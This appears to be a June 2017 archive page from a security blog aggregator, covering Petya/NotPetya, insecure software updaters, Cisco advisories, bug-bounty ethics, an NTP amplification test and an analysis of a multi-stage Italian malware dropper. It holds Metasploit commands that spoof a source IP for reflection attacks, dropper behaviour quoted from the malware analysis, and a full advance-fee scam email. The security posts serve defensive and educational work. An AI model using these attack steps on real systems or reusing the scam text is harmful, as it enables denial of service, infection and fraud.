Monthly Archives: June 2017

Petya Malware Variant (Update C)

This updated alert is a follow-up to the updated alert titled ICS-ALERT-17-181-01B Petya Malware Variant that was published July 5, 2017, on the NCCIC/ICS-CERT web site. ICS-CERT is aware of reports of a variant of the Petya malware that is affecting several countries. ICS-CERT is releasing this alert to enhance the awareness of critical infrastructure asset owners/operators about the Petya variant and to identify product vendors that have issued recommendations to mitigate the risk associated with this malware.

The Consequences of Insecure Software Updates

In this blog post, I discuss the impact of insecure software updates as well as several related topics, including mistakes made by software vendors in their update mechanisms, how to verify the security of a software update, and how vendors can implement secure software updating mechanisms.

Earlier in June of this year, I published two different vulnerability notes about applications that update themselves insecurely:

  • VU#846320 - Samsung Magician fails to update itself securely
  • VU#489392 - Acronis True Image fails to update itself securely

In both of these cases, the apparent assumption the software makes is that it is operating on a trusted network and that no attacker would attempt to modify the act of checking for or downloading the updates. This is not a valid assumption to make.

Consider the situation where you think you're on your favorite coffee shop's WiFi network. If you have even a single application with an insecure update mechanism, you risk becoming the victim of what's known as an evilgrade attack. That is, you may inadvertently install code from an attacker during the software update process. Given that software updaters usually run with administrative privileges, the attacker's code will subsequently run with administrative privileges as well. In some cases, this can happen with no user interaction. This risk has been publicly known since 2010.

The dangers of an insecure update process are much more severe than an individual user being compromised while on an untrusted network. As the recent ExPetr/NotPetya/Petya wiper malware has shown, the impact of insecure updates can be catastrophic. Let me expand on this topic by discussing several important aspects of software updates:

  1. What mistakes can software vendors make when designing a software update mechanism?
  2. How can I verify that my software performs software updates securely?
  3. How should vendors implement a secure software update mechanism?

Insecure Software Updates and Petya

Microsoft has reported that the Petya malware originated from the update mechanism for the Ukrainian tax software called MEDoc. Because of the language barrier, I was not able to exercise the software thoroughly. However, with the help of CERT Tapioca, I was able to observe the network traffic that was being used for software updates. This software makes two critical mistakes in its update mechanism: (1) it uses the insecure HTTP protocol, and (2) the updates are not digitally signed.

These are the same two mistakes that the vulnerable Samsung Magician software (VU#846320) and the vulnerable Acronis True Image software (VU#489392) contain. Let's dig into the two main flaws in software updaters:

Use of an Insecure Transport Layer

HTTP is used in a number of software update mechanisms, as opposed to the more secure HTTPS protocol. What makes HTTPS more secure? Properly configured HTTPS communications attempt to achieve three goals:

  1. Confidentiality - Traffic is protected against eavesdropping.
  2. Integrity - Traffic content is protected against modification.
  3. Authenticity - The client verifies the identity of the server being contacted.

Let's compare an update mechanism that uses properly configured HTTPS against one that uses either HTTP, or HTTPS without certificate validation:

Properly configured HTTPS:
  • Software update request content is not visible to attackers.
  • Software update requests cannot be modified by an attacker.
  • Software update traffic cannot be redirected by an attacker.

HTTP, or HTTPS without certificate validation:
  • An attacker can view the contents of software update requests.
  • An attacker can modify update requests or responses to change the update behavior or outcome.
  • An attacker can intercept and redirect software update requests to a malicious server.

Based on its inability to address these three goals, it is clear that HTTP is not a viable solution for software update traffic.
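The difference between these two configurations can be seen directly in client code. Here is a minimal Python sketch, using only the standard library, of the settings that separate a validating HTTPS client from the insecure pattern found in vulnerable updaters:

```python
import ssl

# A properly validating HTTPS client: the default context verifies the
# server's certificate chain against trusted root CAs and checks that the
# certificate matches the hostname, providing integrity and authenticity.
secure_ctx = ssl.create_default_context()
print(secure_ctx.check_hostname)                     # True
print(secure_ctx.verify_mode == ssl.CERT_REQUIRED)   # True

# The insecure pattern: HTTPS with validation disabled. Any MITM (such as
# CERT Tapioca) can present its own certificate and the client will accept
# it, which is effectively no better than plain HTTP.
insecure_ctx = ssl._create_unverified_context()
print(insecure_ctx.check_hostname)                   # False
print(insecure_ctx.verify_mode == ssl.CERT_NONE)     # True
```

Either context can be passed to `urllib.request.urlopen(url, context=...)`, but only the first actually provides the three goals above.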

Lack of Digital Signatures for Updates

If software updates are not digitally signed, or if the software update mechanism does not validate signatures, an attacker can replace a software update with malware. A simple check I like to perform when testing software updaters is to see whether the software will download and install Windows calc.exe in place of the expected update. If calc.exe pops up when the update occurs, we have evidence of a vulnerable update mechanism!
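To illustrate the idea, here is a minimal Python sketch of rejecting a tampered update. The payloads are hypothetical, and a pinned SHA-256 digest is used as a simplified stand-in for real signature validation, which would verify a vendor signature with a public key:

```python
import hashlib

# Hypothetical payloads, for illustration only.
genuine_update = b"contents of the real vendor update"
tampered_update = b"calc.exe swapped in by an attacker"

# Digest the vendor would publish out-of-band. In a real updater this would
# be a digital signature verified against the vendor's public key, not just
# a hash.
known_good = hashlib.sha256(genuine_update).hexdigest()

def update_is_authentic(payload: bytes, expected_digest: str) -> bool:
    """Refuse any update whose digest doesn't match the published value."""
    return hashlib.sha256(payload).hexdigest() == expected_digest

print(update_is_authentic(genuine_update, known_good))   # True
print(update_is_authentic(tampered_update, known_good))  # False
```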

Verifying Software Updaters

CERT Tapioca can be used to easily observe if an application uses HTTP or non-validated HTTPS traffic for updates. Any update traffic that appears in the Tapioca mitmproxy window is an indication that the update uses an insecure transport layer. As long as the mitmproxy root CA certificate is not installed on the client system, the only traffic that will appear in the mitmproxy window will be HTTP traffic and HTTPS traffic that is not checked for a trusted root CA, both of which are insecure.

Determining whether an application validates the digital signatures of updates requires a little more work. Essentially, you need to intercept the update and redirect it to an update under your control that is either unsigned or signed by another vendor.

A "Belt and Suspenders" Approach to Updates

If an update mechanism uses HTTPS, it should ensure that a software update mechanism is only communicating with a legitimate update server, right? And shouldn't that be enough to ensure a secure update? Well, not exactly.

First, HTTPS is not without flaws. There have been a number of flaws in the various protocols and ciphersuites supported by HTTPS, including FREAK, DROWN, BEAST, CRIME, BREACH, and POODLE. Such flaws, though since addressed in modern TLS protocol versions, can weaken the confidentiality, integrity, and authenticity goals that HTTPS aims to provide. It is also important to realize that even without such flaws, HTTPS without pinning can ensure website authenticity only to the level that the PKI and certificate authority architecture allow. See Moxie Marlinspike's post SSL and the Future of Authenticity for more details.

HTTPS flaws and other weaknesses aside, using HTTPS without signature-validated updates leaves a large open hole that can be attacked. What happens if an attacker can compromise an update server? If software update signatures are not validated, a compromise of a single server can result in malicious software being deployed to all clients. There is evidence that this is exactly what happened in the case of MEDoc.

[Image: virus_attack.png, translated via Google Translate]

Using HTTPS can help to ensure both the transport layer security as well as the identity of the update server. Validating digital signatures of the updates themselves can help limit the damage even if the update server is compromised. Both of these aspects are vital to the operation of a secure software update mechanism.

Conclusion and Recommendations

Despite evilgrade being a publicly-known attack for about seven years now, it is still a problem. Because of the nature of how software is traditionally installed on Windows and Mac systems, we live in a world where every application may end up implementing its own auto-update mechanism independently. And as we are seeing, software vendors are frequently making mistakes in these updaters. Linux and other operating systems that use package-management systems appear to be less affected by this problem, due to the centralized channel through which software is installed.

Recommendations for Users

So what can end users do to protect themselves? Here are my recommendations:

  • Especially when on untrusted networks, be wary of automatic updates. When possible, retrieve updates using your web browser from the vendor's HTTPS website. Popular applications from major vendors are less likely to contain vulnerable update mechanisms, but any software update mechanism has the possibility of being susceptible to attack.
  • For any application you use that contains an update mechanism, verify that the update is at least not vulnerable to a MITM attack by performing the update using CERT Tapioca as an internet source. Virtual machines make this testing easier.

Recommendations for Developers

What can software developers do to provide software updates that are secure? Here are my recommendations:

  • If your software has an update mechanism, ensure that it both:
    • Uses properly validated HTTPS for a communications channel instead of HTTP
    • Validates digital signatures of retrieved updates before installing them
  • To protect against an update server compromise affecting your users, ensure that the code signing key is not present on the update server itself. To increase protection against malicious updates, ensure the code signing key is offline, or otherwise unavailable to an attacker.
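Putting the two recommendations together, a secure update fetch might look like the following Python sketch. The URL and digest parameters are hypothetical, and the pinned SHA-256 check stands in for full signature validation over the downloaded file:

```python
import hashlib
import ssl
import urllib.request

def fetch_update(url: str, expected_sha256: str) -> bytes:
    """Download an update over validated HTTPS and check its integrity.

    A sketch only: a production updater should verify a digital signature
    made with an offline code signing key, not just a pinned hash.
    """
    # Refuse insecure transports outright.
    if not url.startswith("https://"):
        raise ValueError("refusing to fetch updates over insecure transport")
    # The default context performs certificate chain + hostname validation.
    ctx = ssl.create_default_context()
    with urllib.request.urlopen(url, context=ctx) as resp:
        payload = resp.read()
    # Reject anything that does not match the expected digest.
    if hashlib.sha256(payload).hexdigest() != expected_sha256:
        raise ValueError("update failed integrity check; refusing to install")
    return payload
```

For example, `fetch_update("https://updates.example.com/latest", published_digest)` would proceed, while a plain `http://` URL is rejected before any network traffic is sent.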

Enterprise Security Weekly #51 – Idempotency

Apollo Clark joins us to discuss managing AWS cloud resources, Docker security in the enterprise is our topic for the week, and we discuss the latest enterprise news! Full Show Notes: for all the latest episodes!

Cisco NetFlow Generation Appliance Software 1.0(2) Denial of Service Vulnerability

A vulnerability in the Stream Control Transmission Protocol (SCTP) decoder of the Cisco NetFlow Generation Appliance (NGA) with software before 1.1(1a) could allow an unauthenticated, remote attacker to cause the device to hang or unexpectedly reload, causing a denial of service (DoS) condition. The vulnerability is due to incomplete validation of SCTP packets being monitored on the NGA data ports. An attacker could exploit this vulnerability by sending malformed SCTP packets on a network that is monitored by an NGA data port. SCTP packets addressed to the IP address of the NGA itself will not trigger this vulnerability. An exploit could allow the attacker to cause the appliance to become unresponsive or reload, causing a DoS condition. User interaction could be needed to recover the device using the reboot command from the CLI. The following Cisco NetFlow Generation Appliances are vulnerable: NGA 3140, NGA 3240, NGA 3340. Cisco Bug IDs: CSCvc83320.

Petya Ransomware: What You Need to Know and Do

By: Andrew Hay

Unless you’ve been away from the Internet this week, you’ve no doubt heard by now about the global ransomware outbreak that started in Ukraine and subsequently spread west across Europe, North America, and Australia yesterday. With similarities reminiscent of its predecessor WannaCry, this ransomware attack shut down organizations ranging from the Danish shipping conglomerate Maersk Line to a Tasmanian Cadbury chocolate factory.

I was asked throughout the course of yesterday and today to help clarify exactly what transpired. The biggest challenge with any surprise malware outbreak is the flurry of hearsay, conjecture, speculation, and just plain guessing by researchers, analysts, and the media.

At a very high level, here is what we know thus far:

  • The spread of this campaign appears to have originated in Ukraine but has migrated west to impact a number of other countries, including the United States where pharmaceutical giant Merck and global law firm DLA Piper were hit
  • The initial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MeDoc
  • This appears to be a piece of malware utilizing the EternalBlue exploit disclosed by the Shadow Brokers back in April 2017 when the group released several hacking tools obtained from the NSA
  • Microsoft released a patch in March 2017 to mitigate the discovered remote code execution vulnerabilities that existed in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handled certain requests
  • The malware implements several lateral movement techniques:
    • Stealing credentials or re-using existing active sessions
    • Using file-shares to transfer the malicious file across machines on the same network
    • Using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines
  • Experts continue to debate whether or not this is the known malware variant called Petya, but several researchers and firms claim that it is a never-before-seen variant that they are calling GoldenEye, NotPetya, Petna, or some other name such as Nyetya
  • The jury is still out on whether or not the malware is new or simply a known variant


Who is responsible?

The million-dollar question on everyone’s mind is: “Was this a nation-state-backed campaign designed specifically to target Ukraine?” We at LEO believe that to be highly unlikely for a number of reasons. An opportunistic ransomware campaign with some initial software supply-chain targets is a far more likely scenario than a state-sponsored actor looking to destabilize a country.

Always remember the old adage from Dr. Theodore Woodward: When you hear hoofbeats, think of horses not zebras.

If you immediately start looking for Russian, Chinese, or North Korean state-sponsored actors around every corner, you’ll inevitably construct some attribution and analysis bias. Look for the facts, not the speculation.

What does LEO recommend you do?

We recommend that customers who have not yet installed security update MS17-010 do so as soon as possible. Until you can apply the patch, LEO also recommends the following steps to help reduce the attack surface:

  • Disable SMBv1 with the steps documented at Microsoft Knowledge Base Article 2696547
  • Block incoming SMB traffic on ports 445 and 139 from the public Internet, adding a rule on your border routers, perimeter firewalls, and any intersecting traffic points between higher and lower security network zones
  • Disable remote WMI and file sharing, where possible, in favor of more secure file sharing protocols
  • Ensure that your logging is properly configured for all network-connected systems including workstations, servers, virtualized guests, and network infrastructure such as routers, switches, and firewalls
  • Ensure that your antimalware signatures are up-to-date on all systems (not just the critical ones)
  • Review your patch management program to ensure that emergency patches to mitigate critical vulnerabilities and easily weaponized attacks can be applied in an expedited fashion
  • Finally, consider stockpiling some cryptocurrency, like Bitcoin, to reduce any possible transaction downtime should you find that your organization is forced to pay the ransom. Attempting to acquire Bitcoin during an incident may be time-prohibitive


Should your organization need help or clarification on any of the above recommendations, please don’t hesitate to reach out to LEO Cyber Security for immediate assistance.

Further reading

The post Petya Ransomware: What You Need to Know and Do appeared first on LEO Cyber Security.

Follow up to the vuln disclosure post

Summary of responses from this post:

I wanted to document/summarize some of the responses I received and some of the insights I gained via self observation and my interactions with others on the topic.

I received a few replies (less than I hoped for though). To summarize a few:

-I'm not a greedy bastard for thinking it would "be nice" to get paid for reporting a vuln, but I should not expect it.

-Bug bounty awards are appreciation for the work, not a right.

-Someone made a nice analogy comparing the loss of AWS/Slack keys to the loss of a cell phone or cat. Every person might value the return of that cat or phone differently.

-I'm super late to the game if I want to get on the "complain about bug bounties / compensation" train. **I think this is not quite the same situation, but I appreciate the comment**

-The bigger the company, the harder it is to issue an ad-hoc reward if they don't have an established process.

-They [the vulns] have value - just not monetary. The value is to the end-user.

-Generally speaking, I [the author of the comment] think quite a lot of the BB crowd have a self-entitled, bad attitude.

-Always ask yourself if this will hurt innocent people. If so, report it, but make sure the public knows that they f*cked it up.

This blog post reply:

I got a variety of responses, ranging from "it's the right thing to do" up to "if they don't pay up, they don't get the info." Collectively, I don't think we are any closer to an answer.

To get a bit more personal on the subject. I think this piece from Ferris Bueller's Day Off sums it up to an extent:

"The problem is with me"

I've been giving quite a bit of thought to what component of the process brings me the most excitement and enjoyment. I believe I have identified that component, and I will focus on that piece and work to manage any expectations I place on others.

I very much appreciate everyone that engaged in the conversation with me.

More things to think about for sure :-)

Hack Naked News #131 – June 28, 2017

DoD networks have been compromised, the Shadow Brokers continue their exploits, a Pennsylvania healthcare system gets hit with Petya, and more. Jason Wood of Paladin Security joins us to discuss nations' offensive technical strengths and defensive weaknesses on this episode of Hack Naked News! Full Show Notes: for all the latest episodes!

Email Provider Disables Ransomware Mailbox – Good or Bad?

Here's a headline that will likely make you cheer.
Or it'll make your heart sink as you realize your files are now gone. Forever.

Or maybe it'll get you thinking like it did for me...
Email Provider Shuts Down Petya Inbox Preventing Victims From Recovering Files
I read this line and started thinking ... oh my God ... what are some of the victims going to do?!
"The German email provider's decision is catastrophic news for Petya victims, as they won't be able to email the Petya author in the case they want to pay the ransom to recover sensitive files needed for urgent matters."

While I believe Posteo had good intentions, I believe the net result will be a bad situation made significantly worse. In a ransomware scenario you have three options:

  • Pay up (and hope you get your stuff back)
  • Ignore it and restore from backup (and hope your stuff is backed up)
  • Hope like hell someone cracks the encryption/software/attacker in time to get your files back without having to pay (hey, it's happened before)
The problem is that if you're a Petya victim, option #1 is no longer open to you. There are several scenarios where a victim could have no choice but to pay up, like when backups aren't available (or they haven't planned that far ahead). Now, a few friends on Twitter made a valid argument for what Posteo did - including that they wanted to stop funding an attacker and ultimately had a criminal on their hands they wanted to shut down. All well and good - but think of the impact.

While I don't think it hurts the email provider to continue to keep the mailbox open, closing it down is catastrophic. It's irresponsible. And maybe even a little mean-spirited. Unless you're willing to argue that you've never been a victim, or that you "deserved what you got" (which is a BS argument) this action by Posteo is insane.

On the other side of this coin, there are very good reasons to keep the mailbox open. For example it could provide some insight into the attacker/criminal. Maybe the attacker accidentally accesses the inbox from their home cable modem and investigators can track them down that way. You never know. There's the obvious reason that people should get their files back if they have no other alternative but to pay and we know that is the case in many, many, many cases.

What do you think? I think what Posteo did was rash and maybe a little stupid. Clearly they're not thinking about the victims here - and that's irresponsible.

-- Edit 27-June-17 @ 11:46pm

So this is interesting and helps understand the scope of what's affected and who is impacted. Still think it was a bright idea to kill that mailbox?

Vulnerability Disclosure, Free Bug Reports & Being a Greedy Bastard


Most of my life I've been frustrated/intrigued that my Dad was constantly upset that he would "do the right thing" by people and in return people wouldn't show him gratitude... up to straight up fucking him over in return. Over and over the same cycle would repeat of him doing right by someone only to have that person not reciprocate.

The above is important as it relates to the rest of the post and topic(s).

I was relaying some frustrations to a close non-infosec friend about my experience of discovering that companies had made some fairly serious Internet security uh-ohs... like misconfigured S3 buckets full of DB backups and creds, root AWS keys checked into GitHub, or Slack tokens checked into GitHub/Pastebin that would give those companies a "REALLY bad day". These companies had been receptive to the reporting and fixed the problems, but did NOT have bug bounty programs and thus did not pay a bounty for the reporting of the issue.

My friend, with some great insight and observation, suggested that I was getting frustrated and doing exactly the same thing my Dad was doing by having assumptions on how other people should behave.

So this blog post is an attempt for me to work through some of these issues and have a discussion about the topics.

Questions I don't necessarily have answers for:

1. Does a vulnerability I wasn't asked to find have value?

2. If someone outside your company reports an issue and you fix it, does that issue/report now have value/deserve to be paid for (bug bounty)?

3a. If #1 or #2 is Yes, when a business doesn't have a Bug Bounty program, are they morally/ethically/peer pressure obligated to pay something?  If they have a BB program I think most people agree yes. But what about when they don't?

3b. Does the size of the business make a difference? If so, what level?  mom and pop maybe not, VC funded startup?  30 billion dollar Hedge Fund?

4. Is a "Thanks Bro!" enough, or have we evolved as a society where basically everything deserves some sort of monetary reward? After being an observer of two BB programs... "f**k you pay me" seems to be the current attitude. If they did a public "Thanks Bro", does that make a difference/satisfy my ego?

5a. Is "making the Internet safer" enough of a reward?

5b. Does a company with an open S3 bucket make the Internet less safe? Does a company leaking client data make the Internet less safe? [I think Yes]
Does a company leaking their OWN data make the Internet less safe? [It's good for their competitors]

If they get ransomware'd or their EC2 infra shut down/turned off/deleted Code Spaces-style, am I somewhat (morally) responsible if I didn't report it?

6. Does ignoring a pretty significant issue for a company make me a "bad person"?

7a. Am I a "bad person" if I want $$$ for reporting the issue?

7b. If yes, is that because I make $X and I'm being a greedy bastard? What if I made way less money?

7c. Does ignoring/not reporting an issue because I probably won't get $$ make me a "bad person"? Numbers 1-3 come into play here for sure.

In my last two jobs, I've worked for companies that had bug bounty programs, so my opinion on the above is DEFINITELY shaped by working for companies that "get it": they understand and care about their security posture, and they do feel that reports of security issues by outside researchers have monetary value. An added benefit of having a program, especially through one of the BB vendors, is that you get to NDA the researchers and you get to control disclosure.

Thoughts/comments VERY welcome on this one. Leaving comments seems out of style now, but I do have open DMs on Twitter if you want to go that route. I have a few real-world experiences with this where I let some companies know some pretty serious stuff (a Slack token with access to corp Slack, S3 buckets with creds/DB backups, and root AWS keys checked into GitHub for weeks) where it was fixed with no drama but no bounty paid.


Startup Security Weekly #45 – Walking In Pajamas

Fred Kneip of CyberGRX joins us. In the news, why most startups fail, conference season tips, the question you need to ask before solving any problem, and updates from GreatHorn, Cybereason, Amazon, and more! Full Show Notes: for all the latest episodes!

Cisco Email Security Appliance 9.7.1-hp2-207 Restriction Bypass Vulnerability

A vulnerability in the content scanning engine of Cisco AsyncOS Software for Cisco Email Security Appliances (ESA) could allow an unauthenticated, remote attacker to bypass configured message or content filters on the device. Affected Products: This vulnerability affects all releases prior to the first fixed release of Cisco AsyncOS Software for Cisco Email Security Appliances, both virtual and hardware appliances, if the software is configured to apply a message filter or content filter to incoming email attachments. The vulnerability is not limited to any specific rules or actions for a message filter or content filter. More Information: CSCuz16076. Known Affected Releases: 9.7.1-066 9.7.1-HP2-207 9.8.5-085. Known Fixed Releases: 10.0.1-083 10.0.1-087.

Enterprise Security Weekly #50 – Losing More Hair

Brian Ventura of SANS Institute and Ted Gary of Tenable join us. In the news, five ways to maximize your IT training, pocket-sized printing, 30 years of evasion techniques, and more on this episode of Enterprise Security Weekly! Full Show Notes: for all the latest episodes!

NTP/SNMP amplification attacks

I needed to verify that an SNMP and NTP amplification vulnerability was actually working.

Metasploit has a few scanners for NTP vulns under auxiliary/scanner/ntp/ntp_*, and they will report hosts as being vulnerable to amplification attacks.

msf auxiliary(ntp_readvar) > run

[*] Sending NTP v2 READVAR probes to> (1 hosts)

[+] - Vulnerable to NTP Mode 6 READVAR DRDoS: No packet amplification and a 34x, 396-byte bandwidth amplification
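For context on the numbers in the scanner output above, the READVAR probe is a tiny NTP mode 6 control message, which is what makes amplification possible. Here is a Python sketch of the request layout; the reply size used below is a hypothetical figure in the same range the scanner reported:

```python
import struct

# NTP mode 6 (control) READVAR request: LI=0, version=2, mode=6 packed into
# the first byte, opcode 2 (READVAR) in the second, then the sequence,
# status, association ID, offset, and count fields. 12 bytes total.
li_vn_mode = (0 << 6) | (2 << 3) | 6     # 0x16
READVAR = 2
request = struct.pack(">BBHHHHH", li_vn_mode, READVAR, 0, 0, 0, 0, 0)
print(len(request))                      # 12

# A vulnerable server replies with its whole variable list. Assuming a
# ~396-byte reply to this 12-byte probe, the bandwidth amplification is:
reply_bytes = 396
print(reply_bytes // len(request))       # 33
```

Spoof the source IP on that 12-byte request and the server sends the much larger reply to the victim instead, which is the behavior I was trying to validate.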

I've largely not paid attention to these types of attacks in the past, but in this case I needed to validate that I could get the vulnerable host to send traffic to a target/spoofed IP.

I set up two boxes to run the attack: an attack box and a target box that I used as the spoofed source IP address. I ran tcpdump on the target/spoofed server (yes... listening for UDP packets), and it received no UDP packets when I ran the attack. If I didn't spoof the source IP, the vulnerable server would send data back to the attacker IP, but not to the spoofed IP.

Metasploit (running as root) can spoof the IP for you:

msf auxiliary(ntp_readvar) > set SRCIP
msf auxiliary(ntp_readvar) > run

[*] Sending NTP v2 READVAR probes to> (1 hosts)

[*] Sending 1 packet(s) to from

To rule out a Metasploit-specific issue, I also worked through the attack with scapy following the examples here:

So I asked on Twitter... fucking mistake... After getting past the trolls and the well-intentioned people who didn't think I understood basic networking/spoofing at all (heart u), I was pointed to link #1 and link #2 as the likely reason I couldn't spoof the IP. As well as a hint that the last time someone got it to work, they had to rent a physical server in a dodgy colo.

A bit of reading later, I found a site that lets you check whether a particular ASN supports spoofing, along with stats showing that only 20% of the Internet allows spoofing.


Checking common ISP and cloud provider ASNs showed that most don't allow spoofing.

So mystery solved and another aux module/vuln scanner result that can be quickly triaged and/or ignored.

If someone has had different results please let me know.

Someone asked whether the vulnerable host was receiving the traffic. I couldn't answer for the initial host, but to satisfy my curiosity I built a vulnerable NTP server, and it did NOT receive the traffic, even with hosts from the same VPS provider in the same data center (different subnets).

Hack Naked News #130 – June 20, 2017

Hacking military phone systems, IoT malware activity doubles, more WikiLeaks dumps, decade-old Linux bugs, and more. Jason Wood of Paladin Security joins us to discuss the erosion of ISP privacy rules on this episode of Hack Naked News! Full Show Notes: for all the latest episodes!

Who falls for this?

Sometimes a spammer hits my inbox with something so amusing I feel like I have to share. Check this one out. I can't tell you the last time I received something with such bad grammar, trying so hard to sound official yet catastrophically failing.

Anyway, I think you'll enjoy this one as much as I did.

Federal Bureau of Investigation (FBI)
Anti-Terrorist And Monitory Crime Division.
Federal Bureau Of Investigation.
J.Edgar.Hoover Building Washington Dc
Customers Service Hours / Monday To Saturday
Office Hours Monday To Saturday:
Dear Beneficiary,
Series of meetings have been held over the past 7 months with the secretary general of the United Nations Organization. This ended 3 days ago. It is obvious that you
have not received your fund which is to the tune of $16.5million due to past corrupt Governmental Officials who almost held the fund to themselves for their selfish
reason and some individuals who have taken advantage of your fund all in an attempt to swindle your fund which has led to so many losses from your end and unnecessary
delay in the receipt of your fund.for more information do get back to us.
The National Central Bureau of Interpol enhanced by the United Nations and Federal Bureau of Investigation have successfully passed a mandate to the current Prime
Minister of Cambodia Excellency Hun Sen to boost the exercise of clearing all foreign debts owed to you and other individuals and organizations who have been found not
to have receive their Contract Sum, Lottery/Gambling, Inheritance and the likes. Now how would you like to receive your payment? because we have two method of  payment
which is by Check or by ATM card?
ATM Card: We will be issuing you a custom pin based ATM card which you will use to withdraw up to $5,000 per day from any ATM machine that has the Master Card Logo on
it and the card have to be renewed in 4 years time which is 2022. Also with the ATM card you will be able to transfer your funds to your local bank account. The ATM
card comes with a handbook or manual to enlighten you about how to use it. Even if you do not have a bank account.
Check: To be deposited in your bank for it to be cleared within three working days. Your payment would be sent to you via any of your preferred option and would be
mailed to you via FedEx. Because we have signed a contract with FedEx which should expire 25th of June 2017 you will only need to pay $180 instead of $420 saving
you $240 so if you
Pay before the one week you save $240 note that any one asking you for some kind of money above the usual fee is definitely a fraudsters and you will have to stop
communication with every other person if you have been in contact with any. Also remember that all you will ever have to spend is $180.00 nothing more! Nothing less!
And we guarantee the receipt of your fund to be successfully delivered to you within the next 24hrs after the receipt of payment has been confirmed.
Note: Everything has been taken care of by the Government of Cambodia,The United Nation and also the FBI and including taxes, custom paper and clearance duty so all
you will ever need to pay is $180.
DO NOT SEND MONEY TO ANYONE UNTIL YOU READ THIS: The actual fees for shipping your ATM card is $420 but because FedEx have temporarily discontinued the C.O.D which
gives you the chance to pay when package is delivered for international shipping We had to sign contract with them for bulk shipping which makes the fees reduce from
the actual fee of $420 to $180 nothing more and no hidden fees of any sort!To effect the release of your fund valued at $16.5million you are advised to contact our
correspondent in Asia the delivery officer Miss.Chi Liko with the information below,
You are adviced to contact her with the informations as stated below:
Your full Name..
Your Address:..............
Home/Cell Phone:..............
Preferred Payment Method ( ATM / Cashier Check )
Upon receipt of payment the delivery officer will ensure that your package is sent within 24 working hours. Because we are so sure of everything we are giving you a
100% money back guarantee if you do not receive payment/package within the next 24hrs after you have made the payment for shipping.
Yours sincerely,
Miss Donna Story

Enterprise Security Weekly #49 – 7 Layers

Paul and John discuss malware and endpoint defense. In the news, Carbon Black releases Cb Response 6.1, what to ask yourself before committing to a cybersecurity vendor, Malwarebytes replaces antivirus with endpoint protection, and more on this episode of Enterprise Security Weekly! Full Show Notes: for all the latest episodes!

False Flag Attack on Multi Stage Delivery of Malware to Italian Organisations

Everything started with a well-edited Italian-language email (forwarded to me by a colleague, thank you Luca!) reaching many Italian companies. The email carried a weird attachment: ordine_065.js ("ordine" would be "order" in English), which looked "quite malicious" to me.

Opening the .js attachment makes it clear that it is not an "order form": it turns out to be a downloader. The following image shows the .JS content. Our reversing adventure starts here: we are facing the first stage of infection.

Stage 1: Downloader
The romantic dropper (code in the previous image) downloads and executes a PE file (let's call it the second stage). The IP address seems to be hosted by a telecommunication company located in Ukraine that sells cloud services: dedicated servers, colocation systems, and so on. The language used in this stage perfectly fits the language of the dropping website. Please keep this language in mind, since later on it becomes a nice find.

Listing the dropping site's directory reveals a nice malware "implant" where multiple files are in place, probably to serve multiple attack vectors (e.g., emails, tag inclusions, or script inclusions into benign HTML files). My first analysis was of obf.txt (the following image shows a small piece of it), which woke up my curiosity.

Lateral Analysis: obf.txt
That piece of VB code could be used to obfuscate VBScripts. Many pieces of code belonging to obf.txt are related to a Russian thread where dab00 published it in 2011. Another interesting file is Certificate.js, which shows the following code.

Lateral Analysis: Certificate.js
Quite an original technique to hide a JavaScript file! As you can see, the private and public keys are quoted, which results in a valid .js file that a JS engine interprets correctly. Before getting back to our real attack path, represented by the set.tmp file from Stage 1 (ref. image Stage 1), I decided to perform some slow, intensive manual transformations in order to evaluate the result of GET "" (content in the following image). Certificate.js fetches that data and evaluates it through the function: eval(""+Cs+"")

Lateral Analysis: P8uph16W evaluated javascript
Once beautified it becomes easier to read:

Lateral  Analysis: Fresh IoC on Dropper 2
Now it's obvious what it tries to do: (i) download stat.exe from third-party web sources, (ii) rename the downloaded file using Math.random().toString(36).substr(2, 9) + ".exe", and (iii) launch it by using var VTmBaOw = new ActiveXObject("WScript.Shell");. This is super fun and interesting, but it takes me far away from my original attack path.

So, let's assume the downloaded files are the same (in reality they are not) and get back to our original Stage 1, where a romantic .JS dropper downloads the set.tmp file and executes it (please refer to the image Stage 1: Downloader).

The dropped file is 00b42e2b18239585ed423e238705e501aa618dba, which is currently evading sandboxes and antivirus engines. It is a PE file built from valid compiled .NET source. Let's call it Stage 2, since it comes after Stage 1 ;). Decompiling the second stage, some "ambiguous and oriental characters" appear as the content of the "array" variable (please refer to the following code image).

Stage 2: Oriental Characters in array
By following those "interesting strings" (interesting in the sense of being far away from the previously detected language), I landed on a "reflective function" which used .NET Assembly.Load() to dynamically load the binary translation of the "array" variable and EntryPoint.Invoke() to dynamically run the binary. This is a well-known .NET technique exploiting the language's ability to introspect its own runtime.

Stage 2: Assembly.Load and EntryPoint.Invoke
In order to get the dynamically generated binary in the "array" variable, I decided to patch the sample code. The following picture shows how the .NET code has been patched: simply forcing the control flow to save the dynamically generated content to disk (the red breakpoint). In this specific case we are facing a third stage of infection, composed of an additional PE file (a look at the hex editor reveals the 'MZ' string). Let's call it Stage 3.

Stage 3: Decrypted PE
In order to create Stage 3, Stage 2 needs to decrypt the binary translation of the "array" variable. Analysing the .NET code, it is not hard to figure out where Stage 2 decrypts Stage 3. The decryption loop is a simple XOR-based algorithm with a hardcoded key, as shown in the following image.
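The loop can be mimicked in a few lines of Ruby. This is a sketch of the idea only: the key and sample bytes below are hypothetical placeholders, not the real values from the sample.

```ruby
# Sketch of the Stage 2 -> Stage 3 step: a hardcoded key is XORed
# byte-by-byte (repeating) over the embedded data. Key and data here
# are made up for illustration.
def xor_decrypt(data, key)
  data.bytes.each_with_index.map { |b, i| b ^ key[i % key.length].ord }
      .pack('C*')
end

encrypted = xor_decrypt("MZ\x90\x00", "k3y")   # XOR is symmetric...
decrypted = xor_decrypt(encrypted, "k3y")      # ...so a second pass restores the input
puts decrypted.bytes.map { |b| '%02x' % b }.join(' ')
# => 4d 5a 90 00
```

The 0x4D, 0x5A ('MZ') magic at the start of the decrypted buffer is exactly how the next stage is recognised as a PE file.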

Stage 2: decryption key
The decrypted new stage (named Stage 3) happens to be an interpreted PE file as well! It is built on Microsoft Visual Basic technology (do you remember the lateral analysis?) and it's heavily obfuscated (maybe by obf.txt? ... of course!). The following image shows the third stage's structure.

Stage 3: Structure
The structure highlights three main modules:

1) Anti module. Its aim is to implement various evasion techniques in order to harden the sample and block execution on VMs.
2) Service. Its aim is to launch a background service.
3) RunPe. Its aim is to launch an additional encrypted PE file placed in the resource folder.

